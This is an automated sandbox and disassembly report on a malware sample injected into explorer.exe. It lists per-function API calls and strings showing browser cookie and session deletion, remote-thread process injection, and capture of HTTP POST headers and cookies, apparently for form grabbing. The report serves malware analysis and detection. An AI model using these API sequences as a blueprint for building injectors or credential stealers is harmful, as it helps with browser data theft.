Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
API String ID: 2509890648-2554907557
Opcode ID: bbf905755e3ad8417af9109ee27a85ec93a5d38723a509f5cfba1e9a8957a35a
Instruction ID: 2ca3c454d713730112b0966c5209778fa48bc5eca0e60763c8080c7b3a17d473
Opcode Fuzzy Hash: bbf905755e3ad8417af9109ee27a85ec93a5d38723a509f5cfba1e9a8957a35a
Instruction Fuzzy Hash: 284124F8202304ABC628FB75E944BBF73A9AFC5600F044578B8518B185EB39DB1686A1

Function 030435D4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03041374
Part of subcall function 03041363: Process32First.KERNEL32(00000000,?), ref: 03041393
Part of subcall function 03041363: CloseHandle.KERNELBASE(00000000), ref: 030413CB

Part of subcall function 03041363: lstrcmpiA.KERNEL32(?), ref: 030413A3
Part of subcall function 03041363: Process32Next.KERNEL32(00000000,00000128), ref: 030413C0

Sleep.KERNELBASE(000003E8,?,00000000,?,0304382F,?,03043C53,00000001), ref: 030435FA

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,0304382F,?,03043C53,00000001), ref: 03043613
lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,0304382F,?,03043C53,00000001), ref: 03043623
wsprintfW.USER32 ref: 03043644

Part of subcall function 030414D8: wsprintfW.USER32 ref: 0304150D
Part of subcall function 030414D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0304151C
Part of subcall function 030414D8: wsprintfW.USER32 ref: 03041557
Part of subcall function 030414D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0304156A
Part of subcall function 030414D8: DeleteFileW.KERNELBASE(00000000), ref: 03041571
Part of subcall function 030414D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 03041584
Part of subcall function 030414D8: FindClose.KERNELBASE(00000000), ref: 0304158F

Part of subcall function 03041011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
Part of subcall function 03041011: RtlFreeHeap.NTDLL(00000000), ref: 03041027

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,0304382F,?,03043C53,00000001), ref: 03043672
lstrcatW.KERNEL32(00000000,03044614,?,00000000,?,0304382F,?,03043C53,00000001), ref: 03043682

Strings

%s%s, xrefs: 0304363E
iexplore.exe, xrefs: 030435D7
microsoftedge.exe, xrefs: 030435E1
\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\, xrefs: 0304361D
*.*, xrefs: 0304364D, 0304368B
microsoftedgecp.exe, xrefs: 030435EB

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
API String ID: 2436889709-3669280581
Opcode ID: fce760b7398d1c610031d55792370ae4f3316f778a1189afd5eb5ce444f10483
Instruction ID: 07ad3b81e1512cb288f6284f88e3370c870282f801499c622752b9118b09a8bc
Opcode Fuzzy Hash: fce760b7398d1c610031d55792370ae4f3316f778a1189afd5eb5ce444f10483
Instruction Fuzzy Hash: B511CCF834370077E668B76BAD99F7E1599DBD5B42F050038F605AE2C1DF940B814279

Function 030436A1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03041374
Part of subcall function 03041363: Process32First.KERNEL32(00000000,?), ref: 03041393
Part of subcall function 03041363: CloseHandle.KERNELBASE(00000000), ref: 030413CB

Sleep.KERNELBASE(000003E8,?,00000000,?,03043834,?,03043C53,00000001), ref: 030436B3

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,03043834,?,03043C53,00000001), ref: 030436CC
lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,03043834,?,03043C53,00000001), ref: 030436DC

Part of subcall function 030414D8: wsprintfW.USER32 ref: 0304150D
Part of subcall function 030414D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0304151C
Part of subcall function 030414D8: wsprintfW.USER32 ref: 03041557
Part of subcall function 030414D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0304156A
Part of subcall function 030414D8: DeleteFileW.KERNELBASE(00000000), ref: 03041571
Part of subcall function 030414D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 03041584
Part of subcall function 030414D8: FindClose.KERNELBASE(00000000), ref: 0304158F

Strings

firefox.exe, xrefs: 030436A4
\Mozilla\Firefox\Profiles\, xrefs: 030436D6
cookies.sqlite, xrefs: 030436E4
sessionstore.*, xrefs: 030436F2

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
API String ID: 2731919298-637609321
Opcode ID: fa56e54d3ec0760bf02aeb04dc94853960ef1cf2cd851558a13fc06b558be31b
Instruction ID: c8f6e61ce377d994610fdc3b89dc6e2a1e5d2ffd23207378f06f2b01c931deaa
Opcode Fuzzy Hash: fa56e54d3ec0760bf02aeb04dc94853960ef1cf2cd851558a13fc06b558be31b
Instruction Fuzzy Hash: 5CF0A7E930361033952C736BBD0DFAF199DDBD6A52700013CB1069A580CF980B42427A

Function 03041363 Relevance: 7.5, APIs: 5, Instructions: 39
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03041374
Process32First.KERNEL32(00000000,?), ref: 03041393
lstrcmpiA.KERNEL32(?), ref: 030413A3
Process32Next.KERNEL32(00000000,00000128), ref: 030413C0
CloseHandle.KERNELBASE(00000000), ref: 030413CB

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 868014591-0
Opcode ID: 9ef76c2173d783625343ade137d3039ad52d597efeed17ce24140b4a3cbf2b39
Instruction ID: baabb706ebd34123af7a31f2b93eb82a62c8586887a315dc59b47571bd5d665c
Opcode Fuzzy Hash: 9ef76c2173d783625343ade137d3039ad52d597efeed17ce24140b4a3cbf2b39
Instruction Fuzzy Hash: B3F0C8F55031149BD774AA269D0CBDE77BCEB49322F0001B0F859E2180FB784BA48A98

Function 03041235 Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0304123F
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,03043C33), ref: 03041251

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 752c6d2c76eabce77f077b8798e9d892e1bd40c2bc4a7a2670e8dea45289345b
Instruction ID: 9ce36f9de1150b257f54eef353155a51270bf2a962f51c4940836216db39d735
Opcode Fuzzy Hash: 752c6d2c76eabce77f077b8798e9d892e1bd40c2bc4a7a2670e8dea45289345b
Instruction Fuzzy Hash: A7D017B67062317BE3346ABB6C0CF83AEDDDF86AE1B054025B509D2140D6608920C2F0

Function 03041011 Relevance: 3.0, APIs: 2, Instructions: 12
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03041274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03041281

GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
RtlFreeHeap.NTDLL(00000000), ref: 03041027

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: 7f080ca06aa00a282d3cb9cc2db20c2365fbad29840f51eec76404db0df1df3a
Instruction ID: 9320c4d311d13dd935f2d10372012c167dd35d6fbde3f5467f62cb773d181fd7
Opcode Fuzzy Hash: 7f080ca06aa00a282d3cb9cc2db20c2365fbad29840f51eec76404db0df1df3a
Instruction Fuzzy Hash: 64C08CF580726096CA6477E27A0CBC62A089F09111F0800A1B404D6085CBB88A6482A0

Function 030415A9 Relevance: 3.0, APIs: 2, Instructions: 9
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,0304168B), ref: 030415AF
DeleteFileW.KERNELBASE(00000000), ref: 030415B6

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: a5ae708bffd9248bf4838cb77aa8c1d6dd8fab3c6b2727349c9695defbc26df3
Instruction ID: f718a0d1e2b0c3a72999eeb61b026ea6d9cff5e8a7baaacd6280788e30744e7b
Opcode Fuzzy Hash: a5ae708bffd9248bf4838cb77aa8c1d6dd8fab3c6b2727349c9695defbc26df3
Instruction Fuzzy Hash: BDB09276003630ABD7113B55BA0EBCE2658EF0A211B050042F201A10488BA82B1286EA

Function 03041000 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 5228b5fcfe69dccbd590e310b229fffa950e6397f06cd156f054d3969c9e3420
Instruction ID: d92171d03af683f828cf623e7d2d69856de8c7564fafa82fe5bc4c0736788b6a
Opcode Fuzzy Hash: 5228b5fcfe69dccbd590e310b229fffa950e6397f06cd156f054d3969c9e3420
Instruction Fuzzy Hash: 60A002F99511105BDE4477E5BA0DB153518B744745F1485447146854449B7855348721

Non-executed Functions

Function 03041FE5 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 03041274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03041281

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,74DEE800), ref: 0304201A
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 03042055
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 030420E5
RtlMoveMemory.NTDLL(00000000,030450A0,00000016), ref: 0304210C
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03042134
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03042144
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0304215E
GetLastError.KERNEL32 ref: 03042166
CloseHandle.KERNEL32(00000000), ref: 03042174
Sleep.KERNEL32(000003E8), ref: 0304217B
GetModuleHandleA.KERNEL32(ntdll,atan), ref: 03042191
GetProcAddress.KERNEL32(00000000), ref: 03042198
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 030421AE
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 030421D8
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030421EB
CloseHandle.KERNEL32(00000000), ref: 030421F2
Sleep.KERNEL32(000001F4), ref: 030421F9
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0304220D
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03042224
CloseHandle.KERNEL32(00000000), ref: 03042231
CloseHandle.KERNEL32(?), ref: 03042237
CloseHandle.KERNEL32(?), ref: 0304223D
CloseHandle.KERNEL32(00000000), ref: 03042240

Strings

atan, xrefs: 03042187
ntdll, xrefs: 0304218C
opera_shared_counter, xrefs: 03042157

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$ntdll$opera_shared_counter
API String ID: 1066286714-2737717697
Opcode ID: 50df200d63e5745310e2177db9a77b5aa417d135e2252f5a1fc50ec3e3d95f8c
Instruction ID: 413c4d823b33b8581f089255edece73d0a9162b3b44645cf7f963519516a899b
Opcode Fuzzy Hash: 50df200d63e5745310e2177db9a77b5aa417d135e2252f5a1fc50ec3e3d95f8c
Instruction Fuzzy Hash: E461B2B5606304BFD310EF66CE84E6BBBECEB89750F040629F949D3241DB78DA058B61

Function 0304118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 030411A9
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 030411C1
lstrlen.KERNEL32(?,00000000), ref: 030411C9
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 030411D4
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 030411EE
wsprintfA.USER32 ref: 03041205
CryptDestroyHash.ADVAPI32(?), ref: 0304121E
CryptReleaseContext.ADVAPI32(?,00000000), ref: 03041228

Strings

%02X, xrefs: 030411FF

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 04530965f1ae5ee3ee3f87571e89173eee69d6136abc9033ba5b1a4721f00685
Instruction ID: e608ca03096db144fff35c04419cd3ad081614eddede7aca507f209b07f807b8
Opcode Fuzzy Hash: 04530965f1ae5ee3ee3f87571e89173eee69d6136abc9033ba5b1a4721f00685
Instruction Fuzzy Hash: BF113DB9902108BFEB11AF9AED89FAEBBBCEB44301F1040A5FA05E2150D7754F559B60

Function 030416C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 030416D9
GetCurrentThreadId.KERNEL32 ref: 030416E1
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 030416F1
Thread32First.KERNEL32(00000000,0000001C), ref: 030416FF
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0304171E
SuspendThread.KERNEL32(00000000), ref: 0304172E
CloseHandle.KERNEL32(00000000), ref: 0304173D
Thread32Next.KERNEL32(00000000,0000001C), ref: 0304174D
CloseHandle.KERNEL32(00000000), ref: 03041758

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: c4046203fdfde84bc6e23f1cd76188cbf13a3535875d873175118db16c87a11b
Instruction ID: 4e3a0f138cdf9730e8bb3c5e4f18c4b3461205f7943f695658661124b714b164
Opcode Fuzzy Hash: c4046203fdfde84bc6e23f1cd76188cbf13a3535875d873175118db16c87a11b
Instruction Fuzzy Hash: BA1170F640A200EBD711AF619A48B6FBBF8EF85701F040429F94592144D7388A99CBA3

Function 03042E1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,03042EC5), ref: 03042E27

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03042E52
NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 03042E7F
StrStrIW.SHLWAPI(?,NetworkService), ref: 03042E92

Part of subcall function 03041011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
Part of subcall function 03041011: RtlFreeHeap.NTDLL(00000000), ref: 03041027

Strings

NetworkService, xrefs: 03042E8A

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Process$Heap$InformationQuery$AllocateFreeOpen
String ID: NetworkService
API String ID: 1656241333-2019834739
Opcode ID: 599e161fe9b941fa873fbdf6bcd67bcc947f57afd239218e675e089af3baa717
Instruction ID: dbea0dcc62f3f1e6a4d4953c3357cdd8083052a94554fb67b89329f10661d6aa
Opcode Fuzzy Hash: 599e161fe9b941fa873fbdf6bcd67bcc947f57afd239218e675e089af3baa717
Instruction Fuzzy Hash: F101B1F5302345BFD328BA279C44FAB7A9DEBCC292F014439B50AD6146DBB59A808620

Function 03042974 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 157stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03041141: lstrlen.KERNEL32(?,?,?,00000000,?,030429DD,00000001), ref: 03041150
Part of subcall function 03041141: lstrlen.KERNEL32(:method POST,?,00000000,?,030429DD,00000001), ref: 03041155

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

Part of subcall function 0304104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,03042A16,?,00000001), ref: 03041056

Part of subcall function 0304285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 030428A2

lstrcat.KERNEL32(00000000,dyn_header_host), ref: 03042A4A
lstrcat.KERNEL32(00000001,dyn_header_path), ref: 03042A6C
lstrcat.KERNEL32(?,dyn_header_ua), ref: 03042A8D
RtlZeroMemory.NTDLL(?,0000000A), ref: 03042A96
StrToIntA.SHLWAPI(00000000), ref: 03042AB9
wnsprintfA.SHLWAPI ref: 03042B0D
lstrcat.KERNEL32(00000000,?), ref: 03042B2D
lstrcat.KERNEL32(00000000,{:!:}), ref: 03042B35
lstrcat.KERNEL32(00000000,?), ref: 03042B3C

Strings

dyn_header_path, xrefs: 03042A66
:method POST, xrefs: 030429D1
host , xrefs: 03042A33
dyn_header_host, xrefs: 03042A44
dyn_header_ua, xrefs: 03042A87
:authority , xrefs: 03042A17
user-agent , xrefs: 03042A72
:path , xrefs: 03042A50
{:!:}, xrefs: 03042B2F
%s (HTTP2){:!:}%s%s{:!:}%s{:!:}, xrefs: 03042B06
content-length , xrefs: 03042AA0

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
API String ID: 2605944266-950501416
Opcode ID: d93b687b92ef23716b3692e28dde388e3b8eb20b0464b1e8e22000659b36817a
Instruction ID: efbda9f368a9726376afaa04ff9116d7f348f4e891c6602f454668f65ba3b68f
Opcode Fuzzy Hash: d93b687b92ef23716b3692e28dde388e3b8eb20b0464b1e8e22000659b36817a
Instruction Fuzzy Hash: 0651C1F47063415FC719EF26C980B6EBBDAAFC8204F04086CF8459B246DB74DA458766

Function 03042FAA Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03041141: lstrlen.KERNEL32(?,?,?,00000000,?,030429DD,00000001), ref: 03041150
Part of subcall function 03041141: lstrlen.KERNEL32(:method POST,?,00000000,?,030429DD,00000001), ref: 03041155

RtlZeroMemory.NTDLL(?,0000000A), ref: 03042FFA
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,03043347), ref: 03043024
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03043347), ref: 03043052
wsprintfA.USER32 ref: 030430B9
lstrcat.KERNEL32(00000000,00000000), ref: 030430E5
lstrcat.KERNEL32(?,{:!:}), ref: 030430F8
lstrlen.KERNEL32(?,?,?,?,?,?,?,03046038), ref: 03043109
RtlMoveMemory.NTDLL(00000000), ref: 03043112

Part of subcall function 03041011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
Part of subcall function 03041011: RtlFreeHeap.NTDLL(00000000), ref: 03041027

Strings

User-Agent:, xrefs: 03043094
Cookie:, xrefs: 030430CE
application/x-www-form-urlencoded, xrefs: 03042FAD
Host:, xrefs: 0304303B
%s{:!:}%s{:!:}%s{:!:}, xrefs: 030430B3
Content-Length:, xrefs: 03043004
{:!:}, xrefs: 030430F2
application/json, xrefs: 03042FC5
, xrefs: 03043068

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
API String ID: 2886538537-1627781280
Opcode ID: 603e7c3f48131c703dbff64bbb401bb99e913c0c9b58d838c4f0f833ca6ea24d
Instruction ID: d3e2abc29005bd3c8fe66573bf060995da6a3a32649870870ff72cca99149e68
Opcode Fuzzy Hash: 603e7c3f48131c703dbff64bbb401bb99e913c0c9b58d838c4f0f833ca6ea24d
Instruction Fuzzy Hash: 8F31EEF93023452BD604EB269C55BAF369A9BC4B41F00443CF9028B286DBB99A4987A1

Function 03043132 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 0304322D
wsprintfA.USER32 ref: 0304329E
lstrcat.KERNEL32(00000000,00000000), ref: 030432AF
lstrcat.KERNEL32(00000000,{:!:}), ref: 030432BE
lstrlen.KERNEL32(00000000), ref: 030432C1
RtlMoveMemory.NTDLL(00000000,?,?), ref: 030432D2

Part of subcall function 03041011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
Part of subcall function 03041011: RtlFreeHeap.NTDLL(00000000), ref: 03041027

Strings

%s{:!:}%s{:!:}%s{:!:}, xrefs: 03043298
{:!:}, xrefs: 030432B8
POST, xrefs: 0304327F

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
API String ID: 3430864794-1604029033
Opcode ID: b2f8794dea17a3a93e6df835418d3926157d696b3bceefefc934d0f005ebf61c
Instruction ID: 44a38d21163758eb05320862486057a13d388dc7f1664c18712e8987a11773c8
Opcode Fuzzy Hash: b2f8794dea17a3a93e6df835418d3926157d696b3bceefefc934d0f005ebf61c
Instruction Fuzzy Hash: A54160B9105349AFD314EF11DD48FABBBECFB88345F04092DF54296141DB759A488BA2

Function 03043449 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109stringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03046038), ref: 03043455
lstrcat.KERNEL32 ref: 030434AB

Part of subcall function 03042FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 03042FFA
Part of subcall function 03042FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,03043347), ref: 03043024
Part of subcall function 03042FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03043347), ref: 03043052
Part of subcall function 03042FAA: wsprintfA.USER32 ref: 030430B9
Part of subcall function 03042FAA: lstrcat.KERNEL32(00000000,00000000), ref: 030430E5

Part of subcall function 03042F1F: CreateThread.KERNEL32(00000000,00000000,03042ED2,?,00000000,00000000), ref: 03042F2F
Part of subcall function 03042F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 03042F36

Part of subcall function 0304105D: VirtualFree.KERNEL32(?,00000000,00008000,03042B4B), ref: 03041065

RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 03043504
StrToIntA.SHLWAPI(?,00000000,?), ref: 0304352B
RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0304358D
RtlLeaveCriticalSection.NTDLL(03046038), ref: 030435C1

Part of subcall function 03041274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03041281

Strings

Content-Length:, xrefs: 0304350E
POST, xrefs: 030434F1
, xrefs: 0304353D

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
String ID: $Content-Length:$POST
API String ID: 2960674810-114478848
Opcode ID: 1df47961f3e3000c0f51ce6fcd2bfc47721532036ce534ff2834b6373d1f505d
Instruction ID: 7f76097a8e75f7c8bf54e9dc36b3fee916b776f05a2a46a3d6311fef8a54a29b
Opcode Fuzzy Hash: 1df47961f3e3000c0f51ce6fcd2bfc47721532036ce534ff2834b6373d1f505d
Instruction Fuzzy Hash: 1731D8FC6073449BC715FF64E6547ABBBA9AB85201F0404BCE8128B345EB7A971C8B51

Function 0304186C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A

Part of subcall function 0304106C: lstrlen.KERNEL32(?,?,00000000,00000000,0304189F,74DE8A60,?,00000000), ref: 03041074
Part of subcall function 0304106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 03041086

Part of subcall function 030417DC: RtlZeroMemory.NTDLL(?,00000018), ref: 030417EE

RtlZeroMemory.NTDLL(?,0000003C), ref: 030418FB
